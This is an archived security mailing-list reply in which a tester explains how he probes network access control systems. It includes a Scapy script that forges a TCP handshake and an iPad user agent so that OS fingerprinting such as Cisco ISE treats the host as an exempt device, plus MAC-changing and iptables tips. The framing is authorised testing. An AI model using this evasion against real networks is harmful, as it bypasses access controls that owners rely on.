PaulDotCom mailing list archives
Re: spoofing another machine's fingerprints
From: Joshua Wright <jwright () hasborg com>
Date: Fri, 30 Aug 2013 10:18:29 -0400
As I asked about recently, I'll soon be testing a NAC type device and so I was wondering, is there a tool which will let me watch a device then clone its network fingerprint? By fingerprint I mean things like network settings such as TTLs but also open ports (probably couldn't spoof the service but at least open the port). I know there is a tool that is designed to fool attackers by having a list of different OS's and you chose which you want to pretend to be but rather than pick from a list I want to be able to point it at another machine and say "clone that".What do you do for IP? Do you work out what is on the network through passive observation and then pick something that looks appropriate? Any other suggestions on testing/avoiding NAC? I've not tested with one in action before and don't have anything to practice against. This particular test is to see if it is doing its job properly so specifics on testing a NAC would be good.
When I'm testing a NAC system I connect with a standard Windows or OS X client first, and explore what's accessible, trying to identify the NAC vendor. From there I'll do some passive analysis, and try to determine if there are any exception policies applied (such as a rule for iPad's not having to authenticate, etc.) NAC vendors commonly perform OS fingerprinting to identify devices, and products like Cisco ISE use the fingerprints to apply rules to devices. They can't continually fingerprint the devices though, so they perform an initial analysis, and then subsequent analysis per the NAC configuration (IIRC, Cisco ISE's re-check interval has a minimum delay of 15 minutes, with a default of "check once"). I'll typically change my MAC to get another IP, and use Scapy to complete a 3-way handshake to any accessible host, just to trick the OS fingerprinting rule (Cisco ISE checks TCP option parameters including order of options, which is hard to spoof on Linux, and impossible on Windows, but Scapy does it just fine). Here is a sample script I have laying around: #!/usr/bin/python from scapy.all import * DSTIP="10.10.10.110" # Specify your target where NAC will observe it SPORT=RandNum(1024,65535) ip=IP(dst=DSTIP, flags="DF", ttl=64) tcpopt = [ ("MSS",1460), ("NOP",None), ("WScale",2), ("NOP",None), ("NOP",None), ("Timestamp",(123,0)), ("SAckOK",""), ("EOL",None) ] SYN=TCP(sport=SPORT, dport=80, flags="S", seq=10, window=0xffff, options=tcpopt) SYNACK=sr1(ip/SYN) # Send the packet and record the response as SYNACK my_ack = SYNACK.seq + 1 # Use the SYN/ACK response to get initial seq. number ACK=TCP(sport=SPORT, dport=80, flags="A", seq=11, ack=my_ack, window=0xffff) send(ip/ACK) data = "GET / HTTP/1.1\r\nHost: " + DSTIP + "\r\nMozilla/5.0 (iPad; CPU OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 [...]\r\n\r\n" PUSH=TCP(sport=SPORT,dport=80, flags="PA", seq=11, ack=my_ack, window=0xffff) send(ip/PUSH/data) RST=TCP(sport=SPORT,dport=80, flags="R", seq=11, ack=0, window=0xffff) send(ip/RST) Before you use this script, make sure you apply an iptables rule to stop the Linux native stack from sending a TCP RST to the spoofed TCP SYN. After I get some of this traffic through, I do some more testing to see what my connectivity looks like with netcat or manual Scapy connections. HTH, -Josh _______________________________________________ Pauldotcom mailing list Pauldotcom () mail pauldotcom com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
Current thread:
- spoofing another machine's fingerprints Robin Wood (Aug 30)
- Re: spoofing another machine's fingerprints Joshua Wright (Aug 30)
- Re: spoofing another machine's fingerprints Robin Wood (Aug 30)
- Re: spoofing another machine's fingerprints Charles Watathi (Aug 31)
- Re: spoofing another machine's fingerprints Joshua Wright (Aug 31)
- Re: spoofing another machine's fingerprints Robin Wood (Sep 02)
- Re: spoofing another machine's fingerprints Robin Wood (Aug 30)
- Re: spoofing another machine's fingerprints Joshua Wright (Aug 30)